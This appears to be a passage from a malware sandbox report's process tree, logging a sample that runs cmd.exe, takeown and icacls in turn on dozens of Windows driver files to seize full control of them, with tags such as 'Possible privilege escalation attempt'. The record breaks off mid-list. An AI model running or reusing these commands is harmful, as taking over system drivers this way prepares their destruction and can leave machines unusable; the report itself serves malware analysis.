C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\bxvbda.sys /grant "Admin:F"3⤵PID:2208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdfs.sys && icacls C:\Windows\System32\drivers\cdfs.sys /grant "%username%:F" && exit2⤵PID:2296
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cdfs.sys3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cdfs.sys /grant "Admin:F"3⤵PID:2676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdrom.sys && icacls C:\Windows\System32\drivers\cdrom.sys /grant "%username%:F" && exit2⤵PID:1764
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cdrom.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cdrom.sys /grant "Admin:F"3⤵PID:1636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\circlass.sys && icacls C:\Windows\System32\drivers\circlass.sys /grant "%username%:F" && exit2⤵PID:2616
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\circlass.sys3⤵PID:788
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\circlass.sys /grant "Admin:F"3⤵PID:1052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Classpnp.sys && icacls C:\Windows\System32\drivers\Classpnp.sys /grant "%username%:F" && exit2⤵PID:2608
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Classpnp.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3048
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Classpnp.sys /grant "Admin:F"3⤵PID:2596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CmBatt.sys && icacls C:\Windows\System32\drivers\CmBatt.sys /grant "%username%:F" && exit2⤵PID:2024
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\CmBatt.sys3⤵PID:576
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\CmBatt.sys /grant "Admin:F"3⤵PID:2672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cmdide.sys && icacls C:\Windows\System32\drivers\cmdide.sys /grant "%username%:F" && exit2⤵PID:856
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cmdide.sys3⤵
- Modifies file permissions
PID:2644
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cmdide.sys /grant "Admin:F"3⤵PID:2172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cng.sys && icacls C:\Windows\System32\drivers\cng.sys /grant "%username%:F" && exit2⤵PID:1760
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\cng.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1648
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\cng.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:1608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\compbatt.sys && icacls C:\Windows\System32\drivers\compbatt.sys /grant "%username%:F" && exit2⤵PID:976
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\compbatt.sys3⤵PID:3028
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\compbatt.sys /grant "Admin:F"3⤵PID:1232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CompositeBus.sys && icacls C:\Windows\System32\drivers\CompositeBus.sys /grant "%username%:F" && exit2⤵PID:1860
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\CompositeBus.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2080
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\CompositeBus.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:1948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crashdmp.sys && icacls C:\Windows\System32\drivers\crashdmp.sys /grant "%username%:F" && exit2⤵PID:2860
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\crashdmp.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\crashdmp.sys /grant "Admin:F"3⤵PID:1228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crcdisk.sys && icacls C:\Windows\System32\drivers\crcdisk.sys /grant "%username%:F" && exit2⤵PID:2888
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\crcdisk.sys3⤵PID:1108
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\crcdisk.sys /grant "Admin:F"3⤵PID:752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\csc.sys && icacls C:\Windows\System32\drivers\csc.sys /grant "%username%:F" && exit2⤵PID:1144
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\csc.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:908
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\csc.sys /grant "Admin:F"3⤵PID:284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dfsc.sys && icacls C:\Windows\System32\drivers\dfsc.sys /grant "%username%:F" && exit2⤵PID:2348
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dfsc.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2776
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dfsc.sys /grant "Admin:F"3⤵PID:608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\discache.sys && icacls C:\Windows\System32\drivers\discache.sys /grant "%username%:F" && exit2⤵PID:1956
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\discache.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\discache.sys /grant "Admin:F"3⤵PID:2696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\disk.sys && icacls C:\Windows\System32\drivers\disk.sys /grant "%username%:F" && exit2⤵PID:2456
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\disk.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\disk.sys /grant "Admin:F"3⤵PID:2540
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Diskdump.sys && icacls C:\Windows\System32\drivers\Diskdump.sys /grant "%username%:F" && exit2⤵PID:2496
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Diskdump.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Diskdump.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dmvsc.sys && icacls C:\Windows\System32\drivers\dmvsc.sys /grant "%username%:F" && exit2⤵PID:2764
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dmvsc.sys3⤵PID:2464
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dmvsc.sys /grant "Admin:F"3⤵PID:1796
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmk.sys && icacls C:\Windows\System32\drivers\drmk.sys /grant "%username%:F" && exit2⤵PID:2152
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\drmk.sys3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1624
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\drmk.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmkaud.sys && icacls C:\Windows\System32\drivers\drmkaud.sys /grant "%username%:F" && exit2⤵PID:2856
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\drmkaud.sys3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\drmkaud.sys /grant "Admin:F"3⤵PID:544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Dumpata.sys && icacls C:\Windows\System32\drivers\Dumpata.sys /grant "%username%:F" && exit2⤵PID:648
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\Dumpata.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2780
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\Dumpata.sys /grant "Admin:F"3⤵PID:656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dumpfve.sys && icacls C:\Windows\System32\drivers\dumpfve.sys /grant "%username%:F" && exit2⤵PID:2208
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dumpfve.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dumpfve.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:2576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxapi.sys && icacls C:\Windows\System32\drivers\dxapi.sys /grant "%username%:F" && exit2⤵PID:1736
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxapi.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dxapi.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:1528
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxg.sys && icacls C:\Windows\System32\drivers\dxg.sys /grant "%username%:F" && exit2⤵PID:1628
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxg.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dxg.sys /grant "Admin:F"3⤵PID:2920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgkrnl.sys && icacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "%username%:F" && exit2⤵PID:272
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxgkrnl.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "Admin:F"3⤵PID:1444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgmms1.sys && icacls C:\Windows\System32\drivers\dxgmms1.sys /grant "%username%:F" && exit2⤵PID:1740
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\dxgmms1.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:740
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\dxgmms1.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\elxstor.sys && icacls C:\Windows\System32\drivers\elxstor.sys /grant "%username%:F" && exit2⤵PID:1764
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\elxstor.sys3⤵PID:2276
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\elxstor.sys /grant "Admin:F"3⤵PID:1364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\errdev.sys && icacls C:\Windows\System32\drivers\errdev.sys /grant "%username%:F" && exit2⤵PID:3048
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\errdev.sys3⤵PID:2840
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\errdev.sys /grant "Admin:F"3⤵PID:772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\evbda.sys && icacls C:\Windows\System32\drivers\evbda.sys /grant "%username%:F" && exit2⤵PID:2272
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\evbda.sys3⤵PID:1120
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\evbda.sys /grant "Admin:F"3⤵PID:1800
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\exfat.sys && icacls C:\Windows\System32\drivers\exfat.sys /grant "%username%:F" && exit2⤵PID:3032
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\exfat.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:976
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\exfat.sys /grant "Admin:F"3⤵PID:2012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fastfat.sys && icacls C:\Windows\System32\drivers\fastfat.sys /grant "%username%:F" && exit2⤵PID:328
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fastfat.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1484
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fastfat.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:2100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fdc.sys && icacls C:\Windows\System32\drivers\fdc.sys /grant "%username%:F" && exit2⤵PID:2612
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fdc.sys3⤵PID:2368
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fdc.sys /grant "Admin:F"3⤵PID:996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fileinfo.sys && icacls C:\Windows\System32\drivers\fileinfo.sys /grant "%username%:F" && exit2⤵PID:1280
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fileinfo.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1564
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fileinfo.sys /grant "Admin:F"3⤵PID:2696
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\filetrace.sys && icacls C:\Windows\System32\drivers\filetrace.sys /grant "%username%:F" && exit2⤵PID:2364
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\filetrace.sys3⤵
- Possible privilege escalation attempt
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\filetrace.sys /grant "Admin:F"3⤵PID:1104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\flpydisk.sys && icacls C:\Windows\System32\drivers\flpydisk.sys /grant "%username%:F" && exit2⤵PID:1896
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\flpydisk.sys3⤵PID:2776
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\flpydisk.sys /grant "Admin:F"3⤵PID:2964
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fltMgr.sys && icacls C:\Windows\System32\drivers\fltMgr.sys /grant "%username%:F" && exit2⤵PID:3044
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fltMgr.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fltMgr.sys /grant "Admin:F"3⤵PID:608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fsdepends.sys && icacls C:\Windows\System32\drivers\fsdepends.sys /grant "%username%:F" && exit2⤵PID:2256
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fsdepends.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:904
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fsdepends.sys /grant "Admin:F"3⤵PID:2348
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fs_rec.sys && icacls C:\Windows\System32\drivers\fs_rec.sys /grant "%username%:F" && exit2⤵PID:1948
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fs_rec.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fs_rec.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:2820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fvevol.sys && icacls C:\Windows\System32\drivers\fvevol.sys /grant "%username%:F" && exit2⤵PID:2832
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\fvevol.sys3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2228
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\fvevol.sys /grant "Admin:F"3⤵PID:704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS && icacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "%username%:F" && exit2⤵PID:2788
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS3⤵
- Suspicious use of AdjustPrivilegeToken
PID:108
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "Admin:F"3⤵PID:2544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\GAGP30KX.SYS && icacls C:\Windows\System32\drivers\GAGP30KX.SYS /grant "%username%:F" && exit2⤵PID:2324
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\GAGP30KX.SYS3⤵PID:2360
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\GAGP30KX.SYS /grant "Admin:F"3⤵PID:2488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gm.dls && icacls C:\Windows\System32\drivers\gm.dls /grant "%username%:F" && exit2⤵PID:1336
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\gm.dls3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\gm.dls /grant "Admin:F"3⤵PID:1468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gmreadme.txt && icacls C:\Windows\System32\drivers\gmreadme.txt /grant "%username%:F" && exit2⤵PID:1380
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\gmreadme.txt3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\gmreadme.txt /grant "Admin:F"3⤵PID:2136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hcw85cir.sys && icacls C:\Windows\System32\drivers\hcw85cir.sys /grant "%username%:F" && exit2⤵PID:544
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hcw85cir.sys3⤵PID:2444
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hcw85cir.sys /grant "Admin:F"3⤵PID:2112
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hdaudbus.sys && icacls C:\Windows\System32\drivers\hdaudbus.sys /grant "%username%:F" && exit2⤵PID:1500
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hdaudbus.sys3⤵PID:2276
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hdaudbus.sys /grant "Admin:F"3⤵PID:2812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HdAudio.sys && icacls C:\Windows\System32\drivers\HdAudio.sys /grant "%username%:F" && exit2⤵PID:2188
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\HdAudio.sys3⤵PID:924
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\HdAudio.sys /grant "Admin:F"3⤵PID:1868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbatt.sys && icacls C:\Windows\System32\drivers\hidbatt.sys /grant "%username%:F" && exit2⤵PID:2996
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidbatt.sys3⤵
- Modifies file permissions
PID:612
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidbatt.sys /grant "Admin:F"3⤵PID:2656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbth.sys && icacls C:\Windows\System32\drivers\hidbth.sys /grant "%username%:F" && exit2⤵PID:448
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidbth.sys3⤵PID:1364
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidbth.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidclass.sys && icacls C:\Windows\System32\drivers\hidclass.sys /grant "%username%:F" && exit2⤵PID:1448
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidclass.sys3⤵PID:648
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidclass.sys /grant "Admin:F"3⤵PID:1468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidir.sys && icacls C:\Windows\System32\drivers\hidir.sys /grant "%username%:F" && exit2⤵PID:2672
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidir.sys3⤵PID:1960
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidir.sys /grant "Admin:F"3⤵PID:1212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidparse.sys && icacls C:\Windows\System32\drivers\hidparse.sys /grant "%username%:F" && exit2⤵PID:788
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidparse.sys3⤵PID:2700
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidparse.sys /grant "Admin:F"3⤵PID:2576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidusb.sys && icacls C:\Windows\System32\drivers\hidusb.sys /grant "%username%:F" && exit2⤵PID:820
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hidusb.sys3⤵PID:976
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hidusb.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HpSAMD.sys && icacls C:\Windows\System32\drivers\HpSAMD.sys /grant "%username%:F" && exit2⤵PID:1520
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\HpSAMD.sys3⤵
- Modifies file permissions
PID:2172
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\HpSAMD.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:2876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\http.sys && icacls C:\Windows\System32\drivers\http.sys /grant "%username%:F" && exit2⤵PID:2508
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\http.sys3⤵PID:2012
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\http.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:1688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hwpolicy.sys && icacls C:\Windows\System32\drivers\hwpolicy.sys /grant "%username%:F" && exit2⤵PID:1544
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\hwpolicy.sys3⤵PID:2192
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\hwpolicy.sys /grant "Admin:F"3⤵PID:3208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\i8042prt.sys && icacls C:\Windows\System32\drivers\i8042prt.sys /grant "%username%:F" && exit2⤵PID:2864
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\i8042prt.sys3⤵PID:2436
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\i8042prt.sys /grant "Admin:F"3⤵PID:3296
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaStorV.sys && icacls C:\Windows\System32\drivers\iaStorV.sys /grant "%username%:F" && exit2⤵PID:2344
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iaStorV.sys3⤵PID:904
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iaStorV.sys /grant "Admin:F"3⤵PID:3512
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\idl9ocjosn4peq.sys && icacls C:\Windows\System32\drivers\idl9ocjosn4peq.sys /grant "%username%:F" && exit2⤵PID:1656
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\idl9ocjosn4peq.sys3⤵
- Possible privilege escalation attempt
PID:2008
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\idl9ocjosn4peq.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3312
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iirsp.sys && icacls C:\Windows\System32\drivers\iirsp.sys /grant "%username%:F" && exit2⤵PID:2608
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\iirsp.sys3⤵PID:1676
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\iirsp.sys /grant "Admin:F"3⤵PID:3852
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelide.sys && icacls C:\Windows\System32\drivers\intelide.sys /grant "%username%:F" && exit2⤵PID:2768
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\intelide.sys3⤵PID:2856
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\intelide.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:4088
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelppm.sys && icacls C:\Windows\System32\drivers\intelppm.sys /grant "%username%:F" && exit2⤵PID:1752
